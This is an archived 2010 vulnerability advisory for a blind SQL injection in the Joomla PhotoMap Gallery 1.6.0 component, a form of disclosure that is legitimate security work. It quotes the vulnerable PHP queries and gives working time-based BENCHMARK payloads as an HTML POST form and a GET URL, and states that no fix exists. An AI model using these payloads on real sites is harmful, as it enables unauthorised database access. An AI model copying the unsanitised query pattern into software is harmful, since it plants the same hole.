Home / os / win7

Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL I

Posted on 28 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================
Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection
====================================================================


PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection
 
 Name              PhotoMap Gallery
 Vendor            http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
 Versions Affected 1.6.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-28
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
PhotoMap Gallery  is  a   gallery  component  completely
integrated  into  Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio',  you  can  easily  add geo-tags  to your
photos  so  that  you can remember exactly where they're
from using Google Maps.
 
 
II. DESCRIPTION
_______________
 
Some parameters  are not properly sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
A) Multiple Blind SQL Injection
_______________________________
 
The parameter id passed to controller.php  via POST when
view is set to user and task is set to save_usercategory
is  not  properly sanitised  before being  used in a SQL
query. This  can  be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
 
The parameter folder passed to  imagehandler.php  is not
properly sanitised before used in a SQL query.  This can
be  exploited  to  manipulate  SQL  queries by injecting
arbitrary SQL code.
 
The following is the affected code.
 
controller.php (line 1135):
 
function save_usercategory() {
 
    // Check for request forgeries
    JRequest::checkToken() or jexit( 'Invalid Token' );
         
    $user           = &amp; JFactory::getUser();
    $task           = JRequest::getVar('task');
    $post           = JRequest::get('post');
 
    //perform access checks
    $isNew = ($post['id']) ? false : true;
 
//  $catid = (int) JRequest::getVar('catid', 0);
         
    $db     =&amp; JFactory::getDBO();
    $query = 'SELECT c.id, c.directory'
                . ' FROM #__g_categories AS c'
                . ' WHERE c.id = '.$post['id'];
 
 
imagehandler.php (line 109);
 
function getList() {
 
    static $list;
 
    // Only process the list once per request
    if (is_array($list)) {
        return $list;
    }
 
    // Get folder from request
    $folder = $this-&gt;getState('folder');
    $search = $this-&gt;getState('search');
 
    $query = 'SELECT *'
            . ' FROM #__g_categories'
            . ' WHERE id = '.$folder;
 
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple Blind SQL Injection
 
Replace 89eb36eca1919aff534b13b54796c9a4 with your own.
 
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection&lt;/title&gt;
    &lt;/head&gt;
    &lt;body&gt;
        &lt;form method=&quot;POST&quot; action=&quot;http://127.0.0.1/joomla/index.php&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;89eb36eca1919aff534b13b54796c9a4&quot; value=&quot;1&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;option&quot; value=&quot;com_photomapgallery&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;controller&quot; value=&quot;&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;view&quot; value=&quot;user&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;task&quot; value=&quot;save_usercategory&quot;&gt;
            &lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))&quot;&gt;
            &lt;input type=&quot;submit&quot;&gt;
        &lt;/form&gt;
    &lt;/body&gt;
&lt;/html&gt;
 
 
http://site/path/index.php?option=com_photomapgallery&amp;view=imagehandler&amp;folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
 
 
V. FIX
______
 
No fix.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :